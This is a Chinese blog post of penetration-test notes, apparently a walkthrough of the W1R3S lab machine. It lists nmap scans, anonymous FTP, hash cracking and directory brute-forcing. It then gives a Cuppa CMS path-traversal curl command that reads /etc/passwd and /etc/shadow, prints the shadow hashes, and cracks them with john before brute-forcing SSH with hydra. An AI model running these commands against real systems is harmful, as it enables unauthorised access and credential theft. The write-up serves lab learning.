首页 > 其他分享 >信息收集nmap

信息收集nmap

时间:2024-07-04 16:35:08浏览次数:12  
标签:收集 .. nmap 192.168 -- 信息 txt 37.7

信息收集nmap

sudo nmap -sn 192.168.37.0/24
sudo nmap -sT --min-rate 1000 -p- 192.168.37.7 -oA nmapscan/ports
ports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
sudo nmap -sT -sV -sC -O -p21,22,80,3306 192.168.37.7 -oA nmapscan/detail
sudo nmap -sU --top-ports 20 192.162.37.7 -oA nmapscan/udp
sudo nmap --script=vuln -p21,22,80,3306 192.168.37.7 -oA nmapscan/vuln

ftp > anonymous(username):(passwd)
binary(切换二进制模式,防止下载错误文件)
?(查看文件目录)
ls
prompt(关掉交互式的提示)
mget *.txt(下载所有.txt文件)

hash-identifier(识别哈希加密算法工具)

vim md5

使用john解密md5: john md5

使用网络md5工具破解:This is not a password

echo -n 'This is not a password' | md5sum (验证)

echo 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' | base64 -d (base64解密)

爆破

gobuster

gobuster dir -u http://192.168.37.7/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

dirb指定文件类型查找

dirb http://192.168.37.3/ -X .zip,.txt -o report/dirbveryhart.txt

wfuzz模糊测试

sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.37.3/index.php?FUZZ=something

wbscan

sudo wpscan -e u --url http://192.168.37.3/wordpress

searchsploit cuppa cms

searchsploit cuppa

http://192.168.37.7/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

可以访问

使用post接受参数

使用curl post提交

curl --help all | grep url(查看url post提交具体解释)

curl --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.37.7/administrator/alerts/alertConfigField.php

成功打印passwd文件

查看shadow文件

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
保存并使用john解密

john shadow

也可以直接破解ssh密码

hydra -L user.list -P /usr/share/wordlists/rockyou.txt ssh://192.168.37.7 -t 4

user.list:

Naomi
Hector
Joseph
Albert
Gina
Rico

标签:收集,..,nmap,192.168,--,信息,txt,37.7
From: https://www.cnblogs.com/crabin/p/18284105

相关文章

  • 7月11日云技术研讨会 | 车载信息安全全流程实施方案
        伴随着汽车的智能网联化发展,网络攻击也逐渐渗透漫延至汽车领域,汽车行业面临着重大的信息安全挑战。此外,UNECEWP.29R155和ISO/SAE21434等标准也对汽车的信息安全提出了规范化要求,旨在分阶段将产品全生命周期中由信息安全威胁导致的风险降低到合理的范围。汽车信息安......
  • (2023.6更新)文献述评-数字经济与高质量发展(原始文本和提取信息)
    数字经济作为现代经济活动的重要组成部分,正日益成为推动经济社会高质量发展的关键因素。以下是对数字经济与高质量发展文献述评数据的介绍:数据简介定义:数字经济是基于数字技术的经济形态,侧重于数据资源的利用,优化资源配置,提升生产力。作用:数字经济对传统产业的升级转型和新兴......
  • JVM专题之G1垃圾收集器上
    JDK8为什么不用CMS做为默认垃圾收集器呢1.CMS单线程或者双线程情况下效率很低2.CMS会并发失败3.CMS可中止的预处理会导致极限5S停顿4.并发失败进入foregroud还会导致进入FullGC,全局MSC整理5.CMS吞吐的设计并不是很优秀G1的目的:GarbageFirst,也就是垃圾优先原则,也就......
  • JVM专题之G1垃圾收集器下
    索引(记录)的源码的工作流程图如下:CSet(CollectionSet回收集合)收集集合(CSet)代表每次GC暂停时回收的一系列目标分区。在任意一次收集暂停中,CSet所有分区都会被释放,内部存活的对象都会被转移到分配的空闲分区中。因此无论是年轻代收集,还是混合收集,工作的机制都是一致的。年轻......
  • JeecgBoot 中如何对敏感信息进行脱敏处理?
    数据脱敏即将一些敏感信息通过加密、格式化等方式处理,展示给用户一个新的或是格式化后的信息,避免了敏感信息的暴露。数据脱敏即将一些敏感信息通过加密、格式化等方式处理,展示给用户一个新的或是格式化后的信息,避免了敏感信息的暴露。一、接口脱敏注解针对接口数据实现脱敏......
  • 【信息系统项目管理师】常见图表
    作文里面的画图题用语言描述画图过程合同采购综合评分标准责任分配矩阵成本预算表成本估算成本管理计划活动清单活动属性变更日志问题日志项目章程自己再添加更多内容甘特图甘特图包含以下三个含义:1、以图形或表格的形式显示活动;2、通用的显示进......
  • 基于springboot实现招聘信息管理系统项目【项目源码+论文说明】计算机毕业设计
    摘要在Internet高速发展的今天,我们生活的各个领域都涉及到计算机的应用,其中包括招聘信息管理系统的网络应用,在外国招聘信息管理系统已经是很普遍的方式,不过国内的线上管理系统可能还处于起步阶段。招聘信息管理系统具有招聘信息管理功能的选择。招聘信息管理系统采用java技......
  • 【总线】AXI4第七课时:AXI的额外的控制信息(PROT和CACHE)
             大家好,欢迎来到今天的总线学习时间!如果你对电子设计、特别是FPGA和SoC设计感兴趣,那你绝对不能错过我们今天的主角——AXI4总线。作为ARM公司AMBA总线家族中的佼佼者,AXI4以其高性能和高度可扩展性,成为了现代电子系统中不可或缺的通信桥梁。    上......
  • 地理信息科学:生态保护的智慧经纬
    在地球这颗蓝色星球上,每一片森林的呼吸、每一条河流的流淌,都是生命交响曲中不可或缺的音符。而地理信息科学(GIS),正是我们手中解读自然密码、护航生态平衡的精密仪器。今天,让我们深入探讨GIS如何在生物多样性保护和生态系统管理中发挥其不可替代的作用。 ......
  • Oracle数据库统计信息收集
    Oracle数据库统计信息收集重新收集表统计信息--重新收集表统计信息BEGINDBMS_STATS.GATHER_TABLE_STATS(OWNNAME=>'ORCL',TABNAME=>'XXX',ESTIMATE_PERCENT=>100,DEGREE=>4);END;重新收集列统计信息......